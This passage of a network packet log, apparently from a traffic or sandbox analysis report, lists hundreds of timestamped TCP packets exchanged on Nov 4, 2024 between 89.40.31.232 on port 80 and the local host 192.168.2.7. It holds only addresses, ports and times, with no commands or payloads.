                                                              Nov 4, 2024 09:27:58.075248003 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.075261116 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.075274944 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.075274944 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.075289011 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.075301886 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.075301886 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.075326920 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.075329065 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.075354099 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.075377941 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.075427055 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.075440884 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.075453043 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.075467110 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.075474977 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.075481892 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.075503111 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.075520039 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.075577021 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.075589895 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.075603008 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.075615883 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.075627089 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.075628996 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.075651884 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.075666904 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.075696945 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.075711012 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.075722933 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.075756073 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.075817108 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.075830936 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.075845957 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.075858116 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.075870037 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.075870037 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.075885057 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.075886011 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.075901031 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.075911045 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.075937033 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.075941086 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.075979948 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.076042891 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.076056957 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.076066971 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.076081038 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.076085091 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.076096058 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.076108932 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.076117992 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.076131105 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.076137066 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.076143980 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.076165915 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.076179028 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.076255083 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.076267958 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.076287031 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.076292992 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.076303959 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.076308966 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.076328039 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.076342106 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.106532097 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.106549978 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.106563091 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.106576920 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.106617928 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.106657028 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.150870085 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.150891066 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.150906086 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.150917053 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.150928974 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.150942087 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.150942087 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.150971889 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.150988102 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.172422886 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.172455072 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.172467947 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.172482014 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.172482014 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.172508001 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.172514915 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.172549963 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.172563076 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.172574997 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.172586918 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.172591925 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.172622919 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.172651052 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.172662020 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.172676086 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.172688007 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.172714949 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.172728062 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.172740936 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.172816992 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.172840118 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.172852993 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.172863960 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.172875881 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.172888041 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.172888994 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.172900915 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.172903061 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.172928095 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.172954082 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.172980070 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.172992945 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.173003912 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.173016071 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.173029900 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.173046112 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.173062086 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.173074007 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.173084974 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.173096895 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.173111916 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.173137903 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.173183918 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.173196077 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.173207045 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.173218966 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.173237085 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.173261881 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.173280954 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.173294067 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.173302889 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.173325062 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.173337936 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.173367023 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.173378944 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.173391104 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.173403978 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.173430920 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.173502922 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.173588037 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.173624039 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.173666954 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.173680067 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.173691988 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.173707962 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.173733950 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.173743963 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.173758030 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.173779011 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.173801899 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.173803091 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.173834085 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.173871994 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.173885107 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.173896074 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.173907995 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.173916101 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.173944950 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.174024105 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.174036026 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.174047947 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.174060106 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.174069881 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.174093962 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.189254045 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.189268112 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.189280033 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.189315081 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.189342022 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.189353943 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.189367056 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.189378977 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.189390898 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.189400911 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.189404011 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.189428091 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.189444065 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.189577103 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.189608097 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.189620018 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.189644098 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.189667940 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.189672947 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.189685106 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.189694881 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.189718008 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.189743042 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.189745903 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.189758062 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.189769983 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.189790964 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.189815998 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.189835072 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.189847946 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.189866066 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.189884901 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.189910889 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.189920902 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.189932108 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.189943075 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.189965963 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.189965963 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.189990044 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.190012932 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190025091 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190033913 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.190042973 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.190059900 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.190071106 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190083027 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190094948 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190114975 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.190144062 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.190165997 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190177917 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190196991 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190207958 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190220118 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.190246105 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.190301895 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190314054 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190327883 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190335989 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.190340996 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190352917 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190365076 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.190388918 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.190411091 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190443039 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190443039 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.190454960 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190466881 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190474987 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.190490961 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.190510035 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.190515041 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190584898 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190598965 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190610886 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190623999 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.190625906 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190639019 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190651894 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.190653086 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190668106 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190673113 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.190690994 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.190713882 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190725088 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190737963 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.190747976 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.190798044 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190809011 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190841913 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.190880060 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190890074 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190901041 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190913916 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190917015 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.190932989 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190936089 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.190962076 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.190987110 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.190999031 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.191023111 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.191025972 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.191039085 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.191050053 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.191071033 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.191524029 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.191565990 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.191572905 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.191584110 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.191606998 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.191618919 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.191626072 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.191632986 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.191657066 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.191674948 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.191688061 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.191700935 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.191715002 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.191724062 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.191740036 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.191759109 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.191771030 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.191781998 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.191804886 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.191823006 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.191824913 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.191838026 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.191870928 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.191891909 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.191905022 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.191924095 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.191924095 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.191939116 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.191951036 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.191956043 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.191967964 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.191983938 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.192001104 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.192045927 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192061901 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192075014 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192085981 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.192090034 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192099094 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.192102909 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192116022 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.192136049 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.192173004 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192184925 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192203045 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192214012 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192217112 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.192228079 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192238092 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.192240000 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192265987 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.192290068 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.192413092 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192423105 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192434072 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192447901 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192455053 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.192464113 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192476988 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192485094 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.192492008 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192503929 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.192521095 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.192595005 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192606926 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192622900 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192637920 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192643881 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.192651033 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192663908 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192671061 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.192679882 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192699909 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.192717075 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.192724943 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192821026 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192833900 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192846060 CET804993289.40.31.232192.168.2.7
